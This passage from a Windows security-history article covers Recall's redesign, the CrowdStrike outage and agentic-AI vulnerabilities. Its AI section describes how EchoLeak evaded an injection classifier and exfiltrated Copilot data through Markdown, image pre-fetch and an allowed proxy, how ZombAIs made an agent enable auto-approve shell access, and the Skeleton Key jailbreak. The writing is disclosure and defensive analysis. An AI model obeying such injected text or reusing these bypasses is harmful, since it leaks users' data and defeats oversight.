&lt;p&gt;The second thread arrived from an unexpected direction. On the same June 13, 2024 that Brad Smith committed Microsoft to the SFI roadmap, Microsoft pulled its flagship Copilot+ PC AI feature five days before launch over a structural problem in its own threat model. The feature was &lt;a href=&quot;https://paragmali.com/blog/microsoft-recall-2024-2026-re-architecture/&quot; rel=&quot;noopener&quot;&gt;Recall&lt;/a&gt;. The timeline that followed is the worked example of what post-SFI AI-feature security review looks like under sustained adversarial pressure.&lt;/p&gt;
&lt;p&gt;On May 20, 2024, Yusuf Mehdi announced Copilot+ PCs with a 40+ TOPS NPU minimum and Recall as the flagship feature [@copilot-pcs-may-20]. Recall&apos;s Generation-1 design was simple: take a screenshot of the user&apos;s screen at intervals, extract text and entities with on-device AI, and store the result in an SQLite database protected by AES-128-XTS volume encryption plus filesystem ACLs scoped to the user. The &quot;Recall is not shared with anyone&quot; framing implied a clean trust boundary. It was wrong.&lt;/p&gt;
&lt;p&gt;On May 28, 2024, the Swiss researcher Alexander Hagenah (&lt;code&gt;@xaitax&lt;/code&gt;) released &lt;code&gt;TotalRecall&lt;/code&gt;, a proof-of-concept extractor that walked the SQLite store with the user&apos;s own privileges and dumped every snapshot [@totalrecall-github]. Two days later, Kevin Beaumont&apos;s DoublePulsar post amplified the threat model into the community&apos;s consciousness with the line that defined the news cycle: &quot;Recall enables threat actors to automate scraping everything you have ever looked at within seconds&quot; [@beaumont-doublepulsar] [@helpnetsecurity-totalrecall]. On June 3, 2024, Google Project Zero&apos;s James Forshaw published the structural-bound observation that the rest of the Recall story would have to live with: &quot;Spoiler, it is only protected through being ACL&apos;ed to SYSTEM and so any privilege escalation (or non-security boundary &lt;em&gt;cough&lt;/em&gt;) is sufficient to leak the information&quot; [@forshaw-acl-jun3-2024]. The parenthetical pointed at Microsoft&apos;s own Security Servicing Criteria for Windows, which treats same-user post-authentication as not a security boundary [@msrc-servicing-criteria].&lt;/p&gt;

Spoiler, it is only protected through being ACL&apos;ed to SYSTEM and so any privilege escalation (or non-security boundary *cough*) is sufficient to leak the information. -- James Forshaw, Google Project Zero, June 3, 2024 [@forshaw-acl-jun3-2024].
&lt;p&gt;On June 7, 2024, Pavan Davuluri posted a Generation-2 commitment: Recall would be default-off, gated by Windows Hello Enhanced Sign-in Security, and would use just-in-time decryption [@recall-davuluri-jun7-2024]. On June 13, 2024, in an in-place edit to the same post, Davuluri pulled Recall from the planned June 18, 2024 Copilot+ PC ship date and moved it into the Windows Insider Program [@recall-davuluri-jun7-2024]. On September 27, 2024, Davuluri posted the Generation-3 architecture: &quot;Encryption keys are protected via the Trusted Platform Module (TPM), tied to a user&apos;s Windows Hello Enhanced Sign-in Security identity, and can only be used by operations within a secure environment called a Virtualization-based Security Enclave (VBS Enclave)&quot; [@recall-davuluri-sept27-2024]. Recall returned to Insiders on November 22, 2024, expanded to AMD and Intel Copilot+ silicon in spring 2025, and reached general availability on May 13, 2025 [@recall-manage-docs].&lt;/p&gt;

A user-mode trustlet that runs inside Virtual Trust Level 1 -- the same isolated environment used by Credential Guard and the Secure Kernel -- with an attested code identity, so that code outside the enclave (including a compromised normal-world kernel) cannot read enclave memory [@vbs-enclaves-docs]. Recall&apos;s Generation-3 design uses a VBS Enclave to perform decryption with TPM-bound keys gated by Windows Hello ESS [@recall-davuluri-sept27-2024] [@hello-ess-docs].

flowchart LR
    subgraph G1 [&quot;Generation 1 (May 20, 2024)&quot;]
        A1[&quot;Screenshots&quot;] --&amp;gt; B1[&quot;Plaintext SQLite&quot;]
        B1 --&amp;gt; C1[&quot;Filesystem ACL to user&quot;]
        C1 --&amp;gt; D1[&quot;Any user-mode process reads&quot;]
    end
    subgraph G3 [&quot;Generation 3 (Sept 27, 2024)&quot;]
        A3[&quot;Screenshots&quot;] --&amp;gt; B3[&quot;AES-encrypted snapshot&quot;]
        B3 --&amp;gt; C3[&quot;VBS Enclave decrypts in VTL1&quot;]
        C3 --&amp;gt; D3[&quot;TPM key release&quot;]
        D3 --&amp;gt; E3[&quot;Windows Hello ESS gate&quot;]
        E3 --&amp;gt; F3[&quot;UI plane render&quot;]
    end
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Key storage&lt;/th&gt;
&lt;th&gt;Decrypt gate&lt;/th&gt;
&lt;th&gt;Trust boundary&lt;/th&gt;
&lt;th&gt;Known public attack&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Gen 1 (May 20, 2024)&lt;/td&gt;
&lt;td&gt;Software, filesystem ACL&lt;/td&gt;
&lt;td&gt;Logon&lt;/td&gt;
&lt;td&gt;Same user account&lt;/td&gt;
&lt;td&gt;TotalRecall, May 28, 2024 [@totalrecall-github]&lt;/td&gt;
&lt;td&gt;Withdrawn&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 2 (Jun 7, 2024)&lt;/td&gt;
&lt;td&gt;Default-off, just-in-time decrypt&lt;/td&gt;
&lt;td&gt;Hello ESS&lt;/td&gt;
&lt;td&gt;Same user account&lt;/td&gt;
&lt;td&gt;Not shipped&lt;/td&gt;
&lt;td&gt;Withdrawn before June 18 [@recall-davuluri-jun7-2024]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 3 (Sept 27, 2024)&lt;/td&gt;
&lt;td&gt;TPM-bound, VBS Enclave [@recall-davuluri-sept27-2024]&lt;/td&gt;
&lt;td&gt;Hello ESS plus enclave attestation&lt;/td&gt;
&lt;td&gt;Enclave with attested identity&lt;/td&gt;
&lt;td&gt;TotalRecall Reloaded, April 2026 -- standard-user COM and DLL injection against AIXHost.exe [@itnews-totalrecall-reloaded]&lt;/td&gt;
&lt;td&gt;GA May 13, 2025 [@recall-manage-docs]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

Recall is *not* the first Microsoft product to ship on VBS Enclaves. SQL Server 2019 Always Encrypted with secure enclaves, generally available November 4, 2019, is the substrate precedent and used the same VTL1 trustlet pattern Recall inherits [@sql-always-encrypted-enclaves]. The correct narrow claim is that Recall is the first VBS-Enclave deployment in the *Windows desktop shell* to face sustained adversarial review by named external researchers.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Both the June 18, 2024 Copilot+ PC ship date and the October 1, 2024 broad-SKU 24H2 RTM date passed without Recall. Recall reached general availability on May 13, 2025 [@recall-manage-docs]. The &quot;24H2 launched with Recall&quot; framing repeated in secondary press is a marketing-cycle compression error; primary sources rule it out.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The April 2026 TotalRecall Reloaded disclosure closed the loop. Hagenah did not attack Recall&apos;s encryption, which he described as sound, or the VBS enclave, which he called &quot;rock solid.&quot; He attacked the &lt;code&gt;AIXHost.exe&lt;/code&gt; process that decrypts and renders the timeline for the user, using a standard-user COM and DLL injection chain. Microsoft determined that the technique &quot;operates within the current, documented security design of Recall&quot; [@itnews-totalrecall-reloaded]. The vault is solid; the delivery truck is, by design, not.&lt;/p&gt;
&lt;p&gt;Recall demonstrated that the AI-feature application plane is a third soft layer, distinct from both identity-token custody and third-party kernel drivers. But the most measurable failure of the era did not involve an AI feature, an attacker, or an exploit. It involved twenty bytes.&lt;/p&gt;
&lt;h3&gt;4.3 CrowdStrike and the road to WESP&lt;/h3&gt;
&lt;p&gt;The third thread is the load-bearing one. A non-malicious data-parsing bug in a third-party kernel driver -- no attacker involved -- bricked roughly &lt;a href=&quot;https://paragmali.com/blog/the-day-85-million-devices-couldnt-boot----and-how-microsoft/&quot; rel=&quot;noopener&quot;&gt;8.5 million Windows hosts&lt;/a&gt; because the OS layer had given that third-party vendor kernel privilege. This is the failure mode the 2006-2009 EU-engagement settlement never stress-tested.&lt;/p&gt;
&lt;p&gt;CrowdStrike&apos;s August 6, 2024 External Technical Root Cause Analysis names the mechanism precisely. Falcon ships two kinds of detection updates: signed Sensor Content shipped infrequently with the sensor itself, and Rapid Response Content shipped multiple times per day as data files interpreted by an in-kernel Content Interpreter. On July 19, 2024 at 04:09 UTC, CrowdStrike pushed Channel File 291, an IPC Template Instance file used by the Inter-Process Communication template type. The Content Interpreter expected 20 input parameters; the file provided 21. The mismatch produced an out-of-bounds memory read in &lt;code&gt;csagent.sys&lt;/code&gt;. The kernel page fault that followed was logged by Microsoft&apos;s own incident analysis at &lt;code&gt;nt!KiPageFault+0x369&lt;/code&gt; with a &lt;code&gt;csagent+0xe14ed&lt;/code&gt; faulting instruction address [@crowdstrike-rca-pdf] [@crowdstrike-exec-summary] [@ms-jul27-2024-security-tools].&lt;/p&gt;

CrowdStrike&apos;s term for the Rapid Response Content delivery unit -- a data file interpreted at runtime by the in-kernel Content Interpreter inside the Falcon sensor. Channel files are not driver binaries and do not go through KMCS; they configure the behavior of a driver that is already loaded [@crowdstrike-rca-pdf].

sequenceDiagram
    participant Cloud as CrowdStrike cloud
    participant Sensor as Falcon sensor (csagent.sys)
    participant CI as In-kernel Content Interpreter
    participant Kernel as NT kernel
    Cloud-&amp;gt;&amp;gt;Sensor: Push Channel File 291 (IPC Template Instance)
    Sensor-&amp;gt;&amp;gt;CI: Load 21 input parameters
    Note over CI: Expected 20 parameters, got 21
    CI-&amp;gt;&amp;gt;CI: Index past array bound
    CI-&amp;gt;&amp;gt;Kernel: OOB read at csagent+0xe14ed
    Kernel-&amp;gt;&amp;gt;Kernel: nt!KiPageFault+0x369
    Kernel-&amp;gt;&amp;gt;Sensor: BSOD across 8.5M hosts
&lt;p&gt;The scale was unambiguous. David Weston&apos;s July 20, 2024 post put the number at &quot;8.5 million Windows devices, or less than one percent of all Windows machines,&quot; and noted that the &quot;broad economic and societal impacts reflect the use of CrowdStrike by enterprises that run many critical services&quot; [@ms-weston-jul20-2024]. Delta Air Lines cancelled approximately 7,000 flights between July 19 and July 25 -- a figure the carrier&apos;s May 2025 lawsuit filings and contemporaneous reporting both anchor to [@wiki-crowdstrike-outage]. Parametrix estimated the direct losses to US Fortune 500 companies alone at roughly 5.4 billion dollars [@cso-hints-kernel].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response over the next nineteen months was a paced institutional walk away from the 2006-2009 settlement, framed publicly as resilience rather than retreat. On September 10, 2024, Microsoft hosted the Windows Endpoint Security Summit at Redmond with eight MVI vendors in attendance [@ms-securityweek-wesp]. David Weston&apos;s September 12, 2024 post captured the framing: &quot;endpoint security vendors and government officials from the U.S. and Europe... strategies for improving resiliency and protecting our mutual customers&apos; critical infrastructure&quot; [@weston-sept12-2024-wess]. On November 19, 2024 at Ignite, Microsoft publicly named the Windows Resiliency Initiative [@thehackernews-crowdstrike-rca] [@ms-securityweek-wesp].&lt;/p&gt;
&lt;p&gt;On June 26, 2025, the Windows Experience blog made the load-bearing commitment that re-opened the kernel-residency question: &quot;Next month, we will deliver a private preview of the Windows endpoint security platform to a set of MVI partners. The new Windows capabilities will allow them to start building their solutions to run outside the Windows kernel. This means security products like anti-virus and endpoint protection solutions can run in user mode just as apps do&quot; [@wri-jun26-2025]. The private preview opened in July 2025 to Bitdefender, CrowdStrike, ESET, SentinelOne, Sophos, Trellix, Trend Micro, and WithSecure [@ms-securityweek-wesp] [@heise-resilient-windows].&lt;/p&gt;

The Windows-supplied user-mode API surface for endpoint security vendors announced at Microsoft Build 2025 and opened to MVI 3.0 partners in private preview in July 2025 [@wri-jun26-2025]. WESP separates kernel-resident event collection (owned by Windows) from vendor-owned policy evaluation (run in a tamper-protected user-mode service). It is the architectural answer to the failure mode CrowdStrike demonstrated -- a vendor data-parsing bug can no longer take the kernel down with it.
&lt;p&gt;In parallel, Microsoft began closing the legacy escape hatch. On March 26, 2026, Microsoft IT Pro group program manager Peter Waxman posted &quot;Advancing Windows driver security: Removing trust for the cross-signed driver program,&quot; announcing that the April 14, 2026 Windows security update would remove trust for the cross-signed driver program in evaluation mode on Windows 11 24H2, 25H2, 26H1, and Server 2025 [@techcommunity-cross-signing]. The April 14, 2026 driver-protection KB followed, blocking the &lt;code&gt;psmounterex.sys&lt;/code&gt; family as the first named exemplar [@april-2026-driver-kb]. Industry coverage framed the move as &quot;closing a 20-year-old critical security hole&quot; [@computerworld-cross-signing] [@techpowerup-cross-signing] [@cybersecuritynews-cross-signing]; the Custom Kernel Signers feature in Application Control for Business is the escape hatch Microsoft preserved for organizations that legitimately need to sign internal kernel drivers, with the Windows Hardware Compatibility Program as the canonical path [@custom-kernel-signers].&lt;/p&gt;

The legacy KMCS trust path, introduced in the early 2000s, that let third-party certificate authorities issue Windows-trusted code-signing certificates for kernel drivers. Because developers managed their own private keys, the program became a frequent target for credential theft and rootkit deployment [@cybersecuritynews-cross-signing]. The April 14, 2026 Windows update removes trust for cross-signed drivers in evaluation mode, leaving WHCP as the canonical submission path.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft has not publicly committed to a hard &quot;AV kernel-driver ban&quot; date. The April 2026 update is a driver-loading-policy change with a Code Integrity-anchored evaluation window (100 runtime hours plus 2 or 3 restarts before policy activates) [@techcommunity-cross-signing], not a categorical AV kernel-driver eviction. WHCP-certified kernel drivers continue to load. Conflating WESP with the Cross-Signing trust deprecation is a recurring citation-audit failure: they are separate primitives that are part of the same multi-year transition.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the OS layer kept hardening while the layer above became the soft spot, the AI agent layer is the youngest version of the same pattern -- and the era is producing its first CVE-grade exemplars in real time.&lt;/p&gt;
&lt;h3&gt;4.4 AI threat-model arrivals&lt;/h3&gt;
&lt;p&gt;The fourth thread is the youngest. By mid-2024 the &lt;a href=&quot;https://paragmali.com/blog/agentic-identity-on-windows-when-the-process-acting-on-your-/&quot; rel=&quot;noopener&quot;&gt;agentic-AI persistence catalog&lt;/a&gt; was beginning to populate in the CVE database, and Microsoft, Apple, Google, and Anthropic were converging on a structural admission: no existing operating-system primitive knows how to enforce policy on an AI agent&apos;s &lt;em&gt;judgment&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The substrate arrived in pieces. May 20, 2024 brought the Copilot+ PC announcement and the NPU as a programmable local surface [@copilot-pcs-may-20]. June 10, 2024 brought Apple&apos;s Private Cloud Compute design paper, whose five core requirements -- stateless computation, enforceable guarantees, no privileged runtime access, non-targetability, and verifiable transparency -- now anchor every &quot;what would attested AI infrastructure look like&quot; conversation in the industry [@apple-pcc]. June 26, 2024 brought Microsoft&apos;s first public write-up of a multi-turn jailbreak class -- Skeleton Key, originally demonstrated by Mark Russinovich at Microsoft Build 2024Russinovich&apos;s stage demo called the technique &quot;Master Key&quot;; the MSRC blog renamed it &quot;Skeleton Key&quot; for public disclosure on June 26, 2024 [@ms-skeleton-key]. -- and the corresponding Prompt Shields mitigation in Azure AI Content Safety [@ms-skeleton-key] [@jailbreak-detection-shields]. August 8, 2024 brought Michael Bargury&apos;s Black Hat USA sessions &quot;15 Ways to Break Your Copilot&quot; and &quot;Living off Microsoft Copilot,&quot; where Bargury demonstrated SharePoint-RAG-grounded exfiltration chains and the LOLCopilot tool that used a victim&apos;s own Copilot to write spear-phishing email in the victim&apos;s writing style [@mbgsec-bargury-pdf] [@thurrott-bargury] [@theregister-bargury].&lt;/p&gt;
&lt;p&gt;The CVE catalog populated through 2025-2026. The single most consequential entry is &lt;strong&gt;EchoLeak (CVE-2025-32711)&lt;/strong&gt; -- a single-email, zero-click data-exfiltration chain against Microsoft 365 Copilot disclosed by Aim Labs in June 2025 [@aim-labs-echoleak] [@nvd-cve-32711]. SecurityWeek&apos;s reporting captures the structural achievement: &quot;In order to execute an EchoLeak attack, the attacker has to bypass several security mechanisms, including cross-prompt injection attack (XPIA) classifiers&quot; [@securityweek-echoleak]. Sentra&apos;s reconstruction enumerates the four bypasses: the XPIA classifier was evaded by phrasing the malicious instructions as if addressed to the human recipient; Copilot&apos;s link-redaction was circumvented with reference-style Markdown; the email client&apos;s automatic image pre-fetch was used to trigger an exfiltration request; and Microsoft Teams&apos; asynchronous preview API -- an allowed domain under Copilot&apos;s Content Security Policy -- was used to proxy the exfiltrated data to the attacker [@sentra-echoleak]. Microsoft classified the vulnerability &quot;critical&quot; with CVSS 9.3 and patched it server-side with no customer action required [@checkmarx-echoleak] [@securityweek-echoleak].&lt;/p&gt;

flowchart TD
    A[&quot;Attacker email lands in user inbox&quot;] --&amp;gt; B[&quot;XPIA classifier bypass via direct-to-user phrasing&quot;]
    B --&amp;gt; C[&quot;RAG retrieval pulls email into Copilot context&quot;]
    C --&amp;gt; D[&quot;Markdown reference-style link bypass of redaction&quot;]
    D --&amp;gt; E[&quot;Automatic image pre-fetch triggers exfiltration request&quot;]
    E --&amp;gt; F[&quot;Teams preview API as allowed CSP domain proxies data&quot;]
    F --&amp;gt; G[&quot;Attacker receives sensitive M365 content&quot;]

Per OWASP LLM01, the class of attacks in which adversary-controlled text fed into a large language model causes the model to take an action the system designer did not intend [@owasp-llm-top10]. Indirect prompt injection is the subclass in which the malicious text reaches the model through retrieved context (RAG, web fetch, email body) rather than the user&apos;s prompt directly. EchoLeak is the canonical indirect-prompt-injection chain against an LLM-application-layer agent.
&lt;p&gt;The catalog around EchoLeak is now substantial. &lt;strong&gt;PromptJacking&lt;/strong&gt; is Koi Security&apos;s collective name for three Anthropic Claude Desktop extension RCE vulnerabilities (Chrome, iMessage, and Apple Notes connectors) -- AppleScript injection from a maliciously crafted URL, rated CVSS 8.9 by Anthropic, fixed in version 0.1.9 in September 2025 [@koi-promptjacking] [@infosec-magazine-promptjacking]. &lt;strong&gt;ShadowPrompt&lt;/strong&gt;, disclosed by Koi Security on March 26, 2026, chained a wildcard origin allowlist (&lt;code&gt;*.claude.ai&lt;/code&gt;) in the Claude Chrome extension with a DOM-based XSS in an Arkose Labs CAPTCHA hosted on &lt;code&gt;a-cdn.claude.ai&lt;/code&gt; to let any website silently inject prompts; the extension had over 3 million users at the time of disclosure [@koi-shadowprompt]. &lt;strong&gt;CVE-2025-53773&lt;/strong&gt; -- &quot;ZombAIs&quot; -- is a GitHub Copilot RCE via prompt-injection-controlled writes to &lt;code&gt;.vscode/settings.json&lt;/code&gt; that enable &lt;code&gt;chat.tools.autoApprove&lt;/code&gt; (&quot;YOLO mode&quot;) and grant the agent unrestricted shell access [@nvd-cve-53773] [@cybersecuritynews-copilot-rce].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CVE or named class&lt;/th&gt;
&lt;th&gt;Affected agent&lt;/th&gt;
&lt;th&gt;Structural bound exploited&lt;/th&gt;
&lt;th&gt;Mitigation status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;EchoLeak (CVE-2025-32711) [@nvd-cve-32711]&lt;/td&gt;
&lt;td&gt;Microsoft 365 Copilot&lt;/td&gt;
&lt;td&gt;LLM Scope Violation -- agent treats retrieved context as trusted&lt;/td&gt;
&lt;td&gt;Server-side patch June 2025 [@securityweek-echoleak]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PromptJacking (CVSS 8.9) [@koi-promptjacking]&lt;/td&gt;
&lt;td&gt;Claude Desktop extensions&lt;/td&gt;
&lt;td&gt;Unsanitized AppleScript template interpolation&lt;/td&gt;
&lt;td&gt;Fixed in version 0.1.9 [@infosec-magazine-promptjacking]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ShadowPrompt [@koi-shadowprompt]&lt;/td&gt;
&lt;td&gt;Claude Chrome extension&lt;/td&gt;
&lt;td&gt;Wildcard origin allowlist plus third-party CAPTCHA XSS&lt;/td&gt;
&lt;td&gt;Origin checks tightened in 1.0.41&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2025-53773 (ZombAIs) [@nvd-cve-53773]&lt;/td&gt;
&lt;td&gt;GitHub Copilot agent&lt;/td&gt;
&lt;td&gt;Agent writes own configuration; YOLO-mode toggle&lt;/td&gt;
&lt;td&gt;Patched [@cybersecuritynews-copilot-rce]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Skeleton Key / Master Key [@ms-skeleton-key]&lt;/td&gt;
&lt;td&gt;Azure-managed LLMs&lt;/td&gt;
&lt;td&gt;Multi-turn safety-policy override&lt;/td&gt;
&lt;td&gt;Prompt Shields mitigation [@jailbreak-detection-shields]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Living off Microsoft Copilot [@mbgsec-bargury-pdf]&lt;/td&gt;
&lt;td&gt;Microsoft 365 Copilot tenant&lt;/td&gt;
&lt;td&gt;RAG-grounded post-compromise abuse&lt;/td&gt;
&lt;td&gt;Phillip Misner: &quot;similar to other post-compromise techniques&quot; [@thurrott-bargury]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Aim Labs coined the phrase &quot;LLM Scope Violation&quot; for the EchoLeak chain. The vocabulary matters: the bug is not that the model failed a safety filter; it is that the model treated retrieved content as instruction. Anthropic&apos;s mid-2025 research note frames the structural caveat in similar terms: &quot;prompt injection is far from a solved problem, particularly as models take more real-world actions... every webpage an agent visits is a potential vector for attack&quot; [@anthropic-prompt-injection].&lt;/p&gt;

The taxonomies these CVEs are graded against are themselves new. OWASP published its Top 10 for Large Language Model Applications in 2023 and refreshed it in 2025 [@owasp-llm-top10]; NIST released the AI Risk Management Framework in January 2023 and the GenAI-specific Profile (AI 600-1) in July 2024 [@nist-ai-rmf] [@nist-ai-600-1]. Both treat prompt injection as a first-class class. Neither is a normative standard the way RFC 8725 is for JWTs.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The structural bound EchoLeak demonstrates is general: any LLM agent that reads adversary-controllable text and can take an action -- write, send, fetch, execute -- has the structural template. Composition (cage plus input filter plus output filter) reduces blast radius; it does not eliminate the class.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the AI agent&apos;s judgment is now a trust principal, the defensive arrivals across the era are the OS-layer hardening that the layer-above-the-OS soft spots are &lt;em&gt;contrasted against&lt;/em&gt;. The next subsection inventories them so the state-of-the-art section can evaluate the whole stack.&lt;/p&gt;
&lt;h3&gt;4.5 Defensive arrivals across the era&lt;/h3&gt;
&lt;p&gt;The fifth thread runs underneath the other four. While the layer above the OS was failing publicly, the OS layer itself kept hardening -- across hardware roots of trust, on-device confidentiality, identity-side enforcement, and the cryptographic substrate.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Pluton&lt;/a&gt; expanded. The November 2020 Microsoft-AMD-Intel-Qualcomm joint announcement is the prior context, AMD Ryzen 6000 in 2022 was the first PC-class shipment, and Intel Core Ultra Series 2 (Lunar Lake, GA September 24, 2024) brought Pluton-as-Partner-Security-Engine to mainstream Intel mobile silicon [@pluton-docs]. Microsoft moved Pluton firmware servicing to the OS update channel, decoupling security-critical TPM-and-RoT updates from OEM BIOS-release cadences. &lt;a href=&quot;https://paragmali.com/blog/beyond-bitlocker-the-three-file-level-encryption-layers-micr/&quot; rel=&quot;noopener&quot;&gt;Personal Data Encryption&lt;/a&gt; -- the per-user, per-file successor to EFS that uses Windows Hello to derive the file-encryption key -- shipped as a default-on option on Windows 11 24H2. Continuous Access Evaluation became the default revocation primitive for Microsoft 365 services, providing roughly 3-minute token-revocation latency in place of the prior cache-bound model [@cae-docs] [@openid-sse].&lt;/p&gt;
&lt;p&gt;The cryptographic substrate finalized. On August 13, 2024, NIST published FIPS 203 (&lt;a href=&quot;https://paragmali.com/blog/post-quantum-cryptography-on-windows-the-thirty-year-migrati/&quot; rel=&quot;noopener&quot;&gt;ML-KEM&lt;/a&gt;, the Module-Lattice-Based Key Encapsulation Mechanism standard) [@fips-203], FIPS 204 (ML-DSA, the Module-Lattice-Based Digital Signature standard) [@fips-204], and FIPS 205 (SLH-DSA, the Stateless Hash-Based Digital Signature standard) [@fips-205], with the Federal Register notice following on August 14, 2024 [@federal-register-pq].&lt;/p&gt;

The three NIST-standardized post-quantum primitives finalized August 13, 2024. ML-KEM (FIPS 203) is the lattice-based key encapsulation mechanism; ML-DSA (FIPS 204) is the lattice-based digital signature standard; SLH-DSA (FIPS 205) is the hash-based signature standard that hedges against future lattice-attack discoveries [@fips-203] [@fips-204] [@fips-205]. NIST chose three families precisely because no single family has both the security-margin and the performance properties needed for every Windows surface.
&lt;p&gt;Microsoft&apos;s SymCrypt cryptographic library shipped ML-KEM and ML-DSA implementations; SChannel began previewing TLS 1.3 with ML-KEM hybrid key exchange; DPAPI-NG envelope-key migration to ML-KEM is in research; Kerberos post-quantum migration is named in the SFI April 2025 progress report as a multi-year program [@sfi-apr-2025]. The eight Windows AI updates published in coordination on April 25, 2025 captured the parallel: responsible AI commitments, Phi Silica multimodal, and Copilot+ PC AI features shipped together as a single coordinated public moment [@blogs-windows-apr25-2025].&lt;/p&gt;
&lt;p&gt;FIPS 206 -- the FN-DSA standard derived from FALCON -- remains in draft as of May 2026; the URL &lt;code&gt;csrc.nist.gov/pubs/fips/206/ipd&lt;/code&gt; returns HTTP 404 because NIST has not published an Initial Public Draft. Anyone needing a current status should look at the NIST Post-Quantum Cryptography project page rather than the per-FIPS page.&lt;/p&gt;
&lt;p&gt;The defensive arrivals are real and substantial. They do not change the article&apos;s thesis -- they harden the OS layer (Pluton, VBS, PDE, Driver Block List) and the cryptographic substrate (PQC). The thesis is about what happens &lt;em&gt;above&lt;/em&gt; the OS layer.&lt;/p&gt;
&lt;p&gt;Five threads. One inflection. The question the next section must answer: what architectural insight ties them together?&lt;/p&gt;
&lt;h2&gt;5. The Insight&lt;/h2&gt;
&lt;p&gt;Three insights define the era. The article&apos;s thesis is the first; the other two are the context that makes the first ring true. All three must be named because the era&apos;s actual insight is that all three are true simultaneously and reinforce each other.&lt;/p&gt;
&lt;h3&gt;The third-party kernel privilege insight&lt;/h3&gt;
&lt;p&gt;The first insight is the article&apos;s thesis. The CrowdStrike outage refuted the 2006-2009 EU-engagement assumption that AV and EDR vendors &lt;em&gt;needed&lt;/em&gt; kernel access to be effective by demonstrating a failure mode the argument did not address: a non-malicious data-parsing bug inside a privileged third-party kernel driver, no attacker involved, 8.5 million hosts offline, roughly 5.4 billion dollars in Parametrix-estimated direct losses to US Fortune 500 [@ms-weston-jul20-2024] [@cso-hints-kernel] [@crowdstrike-rca-pdf]. The Windows Endpoint Security Platform is the architectural answer: a sanctioned user-mode EDR API surface (tamper-protected, performance-equivalent target, MVI-3.0-gated) co-engineered with the major AV vendors [@wri-jun26-2025]. The April 14, 2026 Cross-Signing Program trust deprecation closes the legacy escape hatch [@techcommunity-cross-signing]. Together, they are a quiet admission that the 25-year settlement was a compromise the era&apos;s evidence has now made unsustainable.&lt;/p&gt;

flowchart TD
    subgraph Kernel [&quot;Kernel (OS-owned)&quot;]
        K1[&quot;ETW providers&quot;] --&amp;gt; K2[&quot;Event broker&quot;]
        K3[&quot;Process and file telemetry&quot;] --&amp;gt; K2
    end
    K2 --&amp;gt; U1[&quot;Tamper-protected user-mode service&quot;]
    subgraph User [&quot;User mode (vendor-owned)&quot;]
        U1 --&amp;gt; U2[&quot;Vendor detection logic&quot;]
        U2 --&amp;gt; U3[&quot;Vendor action API call&quot;]
    end
    U3 --&amp;gt; Kernel
    L[&quot;Vendor channel-file or model update&quot;] --&amp;gt; U2
&lt;h3&gt;The institution-is-the-boundary insight&lt;/h3&gt;
&lt;p&gt;The second insight is what Storm-0558 plus the CSRB verdict prove together: the &lt;em&gt;vendor&apos;s internal security culture&lt;/em&gt; is part of the platform&apos;s attack surface for every downstream customer. The unrotated 2016 MSA signing key was not a bug; it was a decision (or a default) made inside Microsoft about how long signing keys lived and how they were stored. The missing OWA issuer-validation check was not a bug; it was an architectural assumption developers made about which libraries handled which validation steps. The Secure Future Initiative is the first time a platform vendor has publicly bet executive compensation and the cross-progress-report engineering commitments enumerated in §4.1 on this insight at the corporate level [@sfi-sept-2024] [@sfi-apr-2025] [@sfi-nov-2025-windows].&lt;/p&gt;
&lt;h3&gt;The AI agent is a new trust principal insight&lt;/h3&gt;
&lt;p&gt;The third insight is what the Recall saga is the first widely public worked example of. An AI feature whose threat model is &lt;em&gt;not&lt;/em&gt; covered by AppContainer, VBS, TPM, or DPAPI alone forced Microsoft to invent a new pattern: VBS Enclave plus Windows Hello ESS gating plus TPM-rooted device key plus in-enclave content filtering, with explicit acknowledgement that the UI plane that decrypts content for display is, by Microsoft&apos;s own Security Servicing Criteria, not a security boundary [@recall-davuluri-sept27-2024] [@msrc-servicing-criteria] [@hello-ess-docs] [@vbs-enclaves-docs]. The April 2026 TotalRecall Reloaded disclosure proves the boundary holds at the vault and breaks at the delivery truck, exactly as the September 2024 design predicted it would [@itnews-totalrecall-reloaded]. The agentic-AI CVE catalog -- EchoLeak, PromptJacking, ShadowPrompt, ZombAIs -- shows the broader version of the same pattern: existing primitives can sandbox the agent&apos;s &lt;em&gt;process&lt;/em&gt; and protect its &lt;em&gt;data&lt;/em&gt;; none of them knows how to enforce policy on the agent&apos;s &lt;em&gt;decisions&lt;/em&gt;.&lt;/p&gt;
&lt;blockquote&gt;
